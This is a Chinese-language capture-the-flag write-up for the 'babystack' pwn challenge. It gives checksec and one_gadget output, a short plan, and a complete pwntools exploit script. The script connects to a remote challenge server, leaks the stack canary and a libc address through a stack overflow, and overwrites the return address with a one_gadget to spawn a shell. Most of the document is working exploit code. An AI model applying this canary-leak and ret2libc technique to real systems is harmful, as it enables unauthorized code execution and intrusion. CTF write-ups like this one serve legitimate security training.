0x01

checksec

kk@ubuntu:~/Desktop/black/GFSJ/pwn1$ checksec ./babystack 
[*] '/home/kk/Desktop/black/GFSJ/pwn1/babystack'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

ida
read处存在栈溢出

0x02 思路

1.利用print函数泄露canary
2.泄露puts真正的地址，得到libc基址
3.利用题目给定的libc，查找one_gadget==> 是glibc里调用execve('/bin/sh', NULL, NULL)的一段非常有用的gadget，详细学习戳→glibc里的one_gadget

kk@ubuntu:~/Desktop/black/GFSJ/pwn1$ one_gadget libc-2.23.so 
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

4.构造get shell

0x03 exp

#!usr/bin/python
from pwn import *

io = remote('111.198.29.45', 31251)
# io = process('./babystack')
elf = ELF('./babystack')
libc = ELF('./libc-2.23.so')

rdi_ret = 0x0000000000400a93        #pop rdi ; ret
# start_addr = elf.symbols['__bss_start']
start_addr = 0x0000000000400720
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
one_gadget = 0x45216

print "========leak canary========"
io.sendlineafter(">> ", str(1))
payload = "a" * 0x88
io.sendline(payload)
io.sendlineafter(">> ", str(2))
io.recvuntil("a" * 0x88 + '\n')
canary = u64(io.recv(7).rjust(8, '\x00'))
print ("canary=>" +hex(canary))

print "========leak libc_base========"
io.sendlineafter(">> ", str(1))
payload = "a" * 0x88 + p64(canary) + "a" * 8 + p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(start_addr)
io.sendline(payload)
io.sendlineafter(">> ", str(3))

puts_addr = u64(io.recv(6).ljust(8, '\x00'))
print ("puts_addr=>" +hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
one_gadget = libc_base + one_gadget

print "========get shell========"
io.sendlineafter(">> ", str(1))
payload = "a" * 0x88 + p64(canary) + "a" * 8 + p64(one_gadget) 
io.sendline(payload)
io.sendlineafter(">> ", str(3))


io.interactive()